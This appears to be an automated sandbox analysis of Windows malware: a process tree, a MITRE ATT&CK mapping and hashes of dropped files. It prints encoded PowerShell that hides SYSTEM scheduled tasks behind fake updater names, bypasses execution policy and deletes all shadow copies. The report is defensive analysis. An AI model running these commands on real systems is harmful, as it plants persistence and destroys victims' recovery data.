QBuAGcARABpAHIAZQBjAHQAbwByAHkAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrACIAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgBEAGEAaQBsAHkALAAgACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAcwBlAHQAdABpAG4AZwBzACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBVAHMAZQByACAAIgBTAFkAUwBUAEUATQAiAAoACgAkAGEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAFMAeQBzAHQAZQBtAF8AMQBEADkANAA2ADUAMABfAFgATQA3AFQAIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBOAHYAVABtAFIAZQBwAF8AQwByAGEAcwBoAFIAZQBwAG8AcgB0AF8ARAAyAEUARgAxADgAMwA4ADYAQwA3AEQAQwA0ADYAQwAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAVQBBAHsAMAA2ADQAMgA4ADIANwA5AC0ANABCADkAQgAtADQAMwBDAEMALQBEADYARgAyAC0AQgAyAEYAOQA4ADAAQQBDADQANwA0ADAAfQAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAA==
                            6⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2896
                            • C:\Windows\system32\chcp.com
                              "C:\Windows\system32\chcp.com" 65001
                              7⤵
                                PID:2168
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoATQBpAGMAcgBvAHMAbwBmAHQALQBXAGkAbgBkAG8AdwBzAC0AUwB1AGIAcwB5AHMAdABlAG0ALQBMAGkAbgB1AHgAIAAvAGEAbABsACAALwBuAG8AcgBlAHMAdABhAHIAdAAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoAVgBpAHIAdAB1AGEAbABNAGEAYwBoAGkAbgBlAFAAbABhAHQAZgBvAHIAbQAgAC8AYQBsAGwAIAAvAG4AbwByAGUAcwB0AGEAcgB0AAoAdwBzAGwAIAAtAC0AcwBlAHQALQBkAGUAZgBhAHUAbAB0AC0AdgBlAHIAcwBpAG8AbgAgADIACgAKACQAcABhAGcAZQBmAGkAbABlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBDAG8AbQBwAHUAdABlAHIAUwB5AHMAdABlAG0AIAAtAEUAbgBhAGIAbABlAEEAbABsAFAAcgBpAHYAaQBsAGUAZwBlAHMACgAkAHAAYQBnAGUAZgBpAGwAZQAuAEEAdQB0AG8AbQBhAHQAaQBjAE0AYQBuAGEAZwBlAGQAUABhAGcAZQBmAGkAbABlACAAPQAgACQAZgBhAGwAcwBlAAoAJABwAGEAZwBlAGYAaQBsAGUALgBwAHUAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAYQBnAGUARgBpAGwAZQBTAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADEANgAzADgANAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAaQBnAGgAUABlAHIAZgBvAHIAbQBhAG4AYwBlAFAAbwB3AGUAcgBQAGwAYQBuAEcAdQBpAGQAIAB7AAoAIAAgACAAIAAkAHAAbwB3AGUAcgBQAGwAYQBuAHMAIAA9ACAAcABvAHcAZQByAGMAZgBnACAALwBsAGkAcwB0ACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAFAAYQB0AHQAZQByAG4AIAAiAEcAVQBJAEQAIgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABfACAALQBtAGEAdABjAGgAIAAiAC4AKgBcACgAKAAuACoAPwApAFwAKQAuACoAIgApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwB1AGkAZAAgAD0AIAAkAG0AYQB0AGMAaABlAHMAWwAxAF0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAXwAgAC0AbQBhAHQAYwBoACAAIgAuACoAKABIAGkAZwBoACAAUABlAHIAZgBvAHIAbQBhAG4AYwBlAHwATQDDAKEAeABpAG0AbwAgAEQAZQBzAGUAbQBwAGUAbgBoAG8AfABEAGUAcwBlAG0AcABlAG4AaABvACAATQDDAKEAeABpAG0AbwB8AEEAbAB0AG8AIABEAGUAcwBlAG0AcABlAG4AaABvACkALgAqACIAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABnAHUAaQBkAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkACAAPQAgAEcAZQB0AC0ASABpAGcAaABQAGUAcgBmAG8AcgBtAGEAbgBjAGUAUABvAHcAZQByAFAAbABhAG4ARwB1AGkAZAAKAHAAbwB3AGUAcgBjAGYAZwAgAC8AcwAgACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkAAoACgAkAGcAcgBvAHUAcAAgAD0AIAAiACoAUwAtADEALQAxAC0AMAAiAAoAcwBlAGMAZQBkAGkAdAAgAC8AZQB4AHAAbwByAHQAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwApACAALQByAGUAcABsAGEAYwBlACAAJwBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAuACoAJwAsACAAIgBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAqACQAZwByAG8AdQBwACIAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAHMAZQBjAGUAZABpAHQAIAAvAGMAbwBuAGYAaQBnAHUAcgBlACAALwBkAGIAIABzAGUAYwBlAGQAaQB0AC4AcwBkAGIAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAgAC8AYQByAGUAYQBzACAAVQBTAEUAUgBfAFIASQBHAEgAVABTAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAAoAdgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AAoA
                              6⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2016
                              • C:\Windows\system32\chcp.com
                                "C:\Windows\system32\chcp.com" 65001
                                7⤵
                                  PID:3988
                                • C:\Windows\system32\Dism.exe
                                  "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
                                  7⤵
                                  • Drops file in Windows directory
                                  PID:3648
                                  • C:\Users\Admin\AppData\Local\Temp\1C638E76-1F9B-447E-8584-B0C7DEDC455E\dismhost.exe
                                    C:\Users\Admin\AppData\Local\Temp\1C638E76-1F9B-447E-8584-B0C7DEDC455E\dismhost.exe {F82E1F6A-2B7C-4E45-9C39-C7BE772B7C74}
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Drops file in Windows directory
                                    PID:4692
                                • C:\Windows\system32\Dism.exe
                                  "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
                                  7⤵
                                  • Drops file in Windows directory
                                  PID:2280
                                  • C:\Users\Admin\AppData\Local\Temp\4A87D4FD-8474-4EFA-A27D-2405F0892A06\dismhost.exe
                                    C:\Users\Admin\AppData\Local\Temp\4A87D4FD-8474-4EFA-A27D-2405F0892A06\dismhost.exe {480E893F-60EB-4B17-AA6C-97117FF1D7DF}
                                    8⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Drops file in Windows directory
                                    PID:1540
                                • C:\Windows\system32\wsl.exe
                                  "C:\Windows\system32\wsl.exe" --set-default-version 2
                                  7⤵
                                    PID:2788
                                  • C:\Windows\system32\powercfg.exe
                                    "C:\Windows\system32\powercfg.exe" /list
                                    7⤵
                                    • Power Settings
                                    PID:3516
                                  • C:\Windows\system32\powercfg.exe
                                    "C:\Windows\system32\powercfg.exe" /s
                                    7⤵
                                    • Power Settings
                                    PID:1960
                                  • C:\Windows\system32\SecEdit.exe
                                    "C:\Windows\system32\SecEdit.exe" /export /cfg secconfig.cfg
                                    7⤵
                                      PID:4784
                                    • C:\Windows\system32\SecEdit.exe
                                      "C:\Windows\system32\SecEdit.exe" /configure /db secedit.sdb /cfg secconfig.cfg /areas USER_RIGHTS
                                      7⤵
                                        PID:3916
                                      • C:\Windows\system32\vssadmin.exe
                                        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                        7⤵
                                        • Interacts with shadow copies
                                        PID:2748
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Checks SCSI registry key(s)
                            PID:2696
                          • C:\Windows\system32\srtasks.exe
                            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                            1⤵
                              PID:4576

                            Network

                            MITRE ATT&CK Enterprise v15

                            Reconnaissance

                            Resource Development

                            Initial Access

                            Execution

                            Windows Management Instrumentation

                            1
                            T1047

                            Persistence

                            Boot or Logon Autostart Execution

                            2
                            T1547

                            Registry Run Keys / Startup Folder

                            2
                            T1547.001

                            Create or Modify System Process

                            1
                            T1543

                            Windows Service

                            1
                            T1543.003

                            Power Settings

                            1
                            T1653

                            Privilege Escalation

                            Abuse Elevation Control Mechanism

                            1
                            T1548

                            Bypass User Account Control

                            1
                            T1548.002

                            Boot or Logon Autostart Execution

                            2
                            T1547

                            Registry Run Keys / Startup Folder

                            2
                            T1547.001

                            Create or Modify System Process

                            1
                            T1543

                            Windows Service

                            1
                            T1543.003

                            Defense Evasion

                            Abuse Elevation Control Mechanism

                            1
                            T1548

                            Bypass User Account Control

                            1
                            T1548.002

                            Direct Volume Access

                            1
                            T1006

                            Impair Defenses

                            2
                            T1562

                            Disable or Modify Tools

                            2
                            T1562.001

                            Indicator Removal

                            2
                            T1070

                            File Deletion

                            2
                            T1070.004

                            Modify Registry

                            5
                            T1112

                            Credential Access

                            Discovery

                            Peripheral Device Discovery

                            1
                            T1120

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            3
                            T1082

                            System Location Discovery

                            1
                            T1614

                            System Language Discovery

                            1
                            T1614.001

                            Lateral Movement

                            Collection

                            Command and Control

                            Exfiltration

                            Impact

                            Inhibit System Recovery

                            2
                            T1490

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\BraveCrashHandler.exe
                              Filesize

                              3.5MB

                              MD5

                              22c8fb395b406192392632f047aa3bc9

                              SHA1

                              32a781c50bb713b0c22554af50c5caf94aa0c33f

                              SHA256

                              ada75f08df4bd24b2edb3802d5f625cfa9698f95b665b491e1b772d3ddb8ee78

                              SHA512

                              99df95785e38775371eb527ce7499f94d7361a1ee730f137027f6737e94b427bc07480cd6f8c719f069c6b8708f6b23e64af3c70fe6376c4c45cdcccb0fea7ba

                              Download Submit

                            • C:\ProgramData\BraveShared\BraveSharedUpdater.exe
                              Filesize

                              466KB

                              MD5

                              23350a33531966fa6a0cf02f9c27f053

                              SHA1

                              1f53024c59b6b65fcf032bd5bb69cedbdcc67dfa

                              SHA256

                              0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d

                              SHA512

                              b6f8bbbbc5bf9b4d982bdab369513b5667835aa6660678917c259b599d563c7ad2d8f5233e4c62d962523393d8faa51087e3696fa72cabbde81ec1a39d3adfac

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                              Filesize

                              2KB

                              MD5

                              d136d3411d4aa688242c53cafb993aa6

                              SHA1

                              1a81cc78e3ca445d5a5193e49ddce26d5e25179f

                              SHA256

                              00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

                              SHA512

                              282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1024B

                              MD5

                              8d2aaf61af1d6f7ce4c02449190ba051

                              SHA1

                              b3f2b6f1a8790b29802c11819bbf477df80c21d5

                              SHA256

                              ee507c9fd916d4bcc7746c5873c05bebf6c76c34e8d1e5bbddd89cb66d334623

                              SHA512

                              205ff94a90962ee23cfbaf55295e8d754206f21395fc9662481234ba7217c1e1b233232e65583c79385e4e71844737e15d5e018b2d4341660318a9dab4e33031

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              affb527af1dddec8f17e2080c549e9a9

                              SHA1

                              50e1cbabfd8da5cecac90580ac5a113e4c5568e9

                              SHA256

                              f13d82b27a42207aca8a51571ad4c9a748471427fc3a9dc65841c544af76350a

                              SHA512

                              c5582f6038dfbb1285152336048fd6861f5da4a08db1179f422b051356d70d6722d80ac05e85f7688a13618d2e8493b7b3c2fc12aad16e084636ed80a95081de

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              db53b4b08d0517218b7bc0885c5d0c50

                              SHA1

                              cb1dbf2dc7389da49a4cdd38e0df1680b889158b

                              SHA256

                              9574259487623de43267092f99c402c0f6632651c50ceba76497bbffc66d2aa8

                              SHA512

                              b79b231d15435a192b5ffce18523d270265d4ddddb02b42749c61c92064bc270adde389bb61911c4302576edbce58c63c55548c2adbea605378bb1d4a88634fa

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              db63f0824dc03fa111aca3c25289da4c

                              SHA1

                              f3c434f3745fa8513fc00b6b748b4071ce2bf0e8

                              SHA256

                              395b3d452704f99ca746ea20127708c04ceb6249d9d94ea20ae8dcc3ee11c48c

                              SHA512

                              5f53e4b3176e73ca6b17947226d476d46152151770c382d6f7f5721bc846a13c1699a90dcdf7665ff90e7b941da0f9cbc083648985b57fa3cfe519558f35e69c

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              3af160e5f2e5415a7ca31990b8a3c1fc

                              SHA1

                              f3cca6cd50e5784050e8ccae51e2228081c2622a

                              SHA256

                              2f8238782b88e0c2682edc2a5f6f83ee391256860059c18093578035c1d74940

                              SHA512

                              bd1aa8bcb2f11770d34a4801d567630e700dfdff01f3b8c45e091854c8a4b1b9bcac00d10e8887ac0201fc944ed44668d484fa80651e3302b78f25e5b125bfb5

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              2510833c137dd6db48edb634d1762755

                              SHA1

                              26c21031274aeb382c0e8db492ea52437f8aa7c3

                              SHA256

                              6a98d10e8b60cf6e77290eb5f29fb4f1b7dd427538179474c793e410a17093a1

                              SHA512

                              2d16b44380ed2fe64ddda420c671ecaa9f72ec7f3dde73dc787e17a889e494980d877d9cde84974f0127cae916197d70745850f9c63f7c69dae632ba02edcd85

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              cae7a7bbfc34559b3c4f1d14f068ae38

                              SHA1

                              886471940af0918c254de06e7fb5320c90af7d72

                              SHA256

                              f32c9c46078c062bac825ff1bc949869b0c85517d0348e4060152f3165d536e7

                              SHA512

                              9e2d010470a31050c25796a1340ed61e07f97c5476cf549f7c95e0632c45c3bfb984309b9bb8364070f7cefa6a28593627253681a9db26406e25924224f38d49

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1C638E76-1F9B-447E-8584-B0C7DEDC455E\AppxProvider.dll
                              Filesize

                              554KB

                              MD5

                              a7927846f2bd5e6ab6159fbe762990b1

                              SHA1

                              8e3b40c0783cc88765bbc02ccc781960e4592f3f

                              SHA256

                              913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f

                              SHA512

                              1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1C638E76-1F9B-447E-8584-B0C7DEDC455E\AssocProvider.dll
                              Filesize

                              112KB

                              MD5

                              94dc379aa020d365ea5a32c4fab7f6a3

                              SHA1

                              7270573fd7df3f3c996a772f85915e5982ad30a1

                              SHA256

                              dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907

                              SHA512

